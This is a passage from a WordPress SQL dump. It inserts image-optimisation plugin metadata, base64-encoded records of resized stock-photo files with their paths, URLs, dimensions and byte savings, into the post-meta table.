3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE0MTAsInRpbWUiOjE0ODM1ODQ5ODUsImlkIjo2ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC0xNjAweDEwNjYuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTE2MDB4MTA2Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTE2MDB4MTA2Ni5qcGciLCJyZWR1Y3Rpb24iOjQxMTYsInRpbWUiOjE0ODM1ODQ5OTAsImlkIjo2ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2ODgsInRpbWUiOjE0ODM1ODQ5OTQsImlkIjo2ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MjksInRpbWUiOjE0ODM1ODQ5OTcsImlkIjo2ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NzcsInRpbWUiOjE0ODM1ODUwMDAsImlkIjo2ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMTQyLCJ0aW1lIjoxNDgzNTg1MDA1LCJpZCI6Njg0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1MzgsInRpbWUiOjE0ODM1ODUwMDgsImlkIjo2ODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjYxMiwidGltZSI6MTQ4MzU4NTAxMSwiaWQiOjY4NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzIzLCJ0aW1lIjoxNDgzNTg1MDE1LCJpZCI6Njg0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo4MzUsInRpbWUiOjE0ODM1ODUwMTksImlkIjo2ODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU4MjEyNTM4LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1ODIxMjUzOC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTgyMTI1MzgtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjk2MSwidGltZSI6MTQ4MzU4NTAyMywiaWQiOjY4NH1d'); 
INSERT INTO `wp_postmeta` VALUES (30111, 683, 'wpfc_optimisation_reduction', '11674'); 
INSERT INTO `wp_postmeta` VALUES (30112, 683, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYuanBnIiwid2lkdGgiOjU1NTAsImhlaWdodCI6MzcwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NTAyNywiaWQiOiI2ODMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjE1LCJ0aW1lIjoxNDgzNTg1MDMxLCJpZCI6NjgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6OTM0LCJ0aW1lIjoxNDgzNTg1MDM1LCJpZCI6NjgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6OTA4LCJ0aW1lIjoxNDgzNTg1MDM5LCJpZCI6NjgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozMDQ1LCJ0aW1lIjoxNDgzNTg1MDQ0LCJpZCI6NjgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjA2LCJ0aW1lIjoxNDgzNTg1MDQ3LCJpZCI6NjgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDk2LCJ0aW1lIjoxNDgzNTg1MDUwLCJpZCI6NjgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTM2LCJ0aW1lIjoxNDgzNTg1MDU0LCJpZCI6NjgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6Nzg0LCJ0aW1lIjoxNDgzNTg1MDU3LCJpZCI6NjgzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0ODcsInRpbWUiOjE0ODM1ODUwNjEsImlkIjo2ODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjYyMCwidGltZSI6MTQ4MzU4NTA2NCwiaWQiOjY4M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzgxLCJ0aW1lIjoxNDgzNTg1MDY4LCJpZCI6NjgzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo4ODMsInRpbWUiOjE0ODM1ODUwNzIsImlkIjo2ODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTUzMjgyMjY2LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1MzI4MjI2Ni00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTMyODIyNjYtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjk3OSwidGltZSI6MTQ4MzU4NTA3NSwiaWQiOjY4M31d'); 
INSERT INTO `wp_postmeta` VALUES (30113, 682, 'wpfc_optimisation_reduction', '19033'); 
INSERT INTO `wp_postmeta` VALUES (30114, 682, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEyNzQ0OTY5OC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMjc0NDk2OTguanBnIiwid2lkdGgiOjQyNTYsImhlaWdodCI6MjgxOSwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NTA4MSwiaWQiOiI2ODIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMjc0NDk2OTgtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTI3NDQ5Njk4LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEyNzQ0OTY5OC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NzUxLCJ0aW1lIjoxNDgzNTg1MDg0LCJp